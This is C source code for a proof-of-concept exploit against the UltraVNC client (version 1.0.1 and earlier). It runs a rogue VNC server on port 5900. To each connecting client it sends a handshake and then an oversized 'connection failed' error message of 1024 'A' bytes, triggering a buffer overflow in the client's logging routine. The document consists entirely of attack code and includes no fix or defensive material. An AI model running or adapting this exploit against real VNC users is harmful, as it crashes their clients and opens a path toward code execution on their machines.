/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define PORT    5900
#define BOFSZ   1024
#define HEAD    "RFB 003.006\n"



void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peerl;
    u_int   seed;
    int     sdl,
            sd,
            len,
            on = 1,
            psz;
    u_char  buff[4096];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Ultr@VNC <= 1.0.1 client Log::ReallyPrint buffer-overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(PORT);
    peerl.sin_family      = AF_INET;

    printf("- bind port   %hu\n", PORT);
    sdl = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sdl < 0) std_err();
    if(setsockopt(sdl, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sdl, (struct sockaddr *)&peerl, sizeof(peerl))
      < 0) std_err();
    if(listen(sdl, SOMAXCONN)
      < 0) std_err();

    psz  = sizeof(peerl);
    seed = time(NULL);

    fputs("- clients:\n", stdout);
    for(;;) {
        sd = accept(sdl, (struct sockaddr *)&peerl, &psz);
        if(sd < 0) std_err();

        printf("  %s:%hu\n",
            inet_ntoa(peerl.sin_addr), ntohs(peerl.sin_port));

        // this is only a simple PoC, so no threads and no checks
        if(send(sd, HEAD, sizeof(HEAD) - 1, 0) <= 0) goto quit;

        len = recv(sd, buff, 12, 0);            // no need to check real recv
        if(len <= 0) goto quit;

        *(u_int *)buff       = htonl(0);        // connection failed
        *(u_int *)(buff + 4) = htonl(BOFSZ);    // size of the error
        memset(buff + 8, 'A', BOFSZ);           // error
        if(send(sd, buff, 8 + BOFSZ, 0) <= 0) goto quit;

quit:
        close(sd);
    }

    close(sdl);
    return(0);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


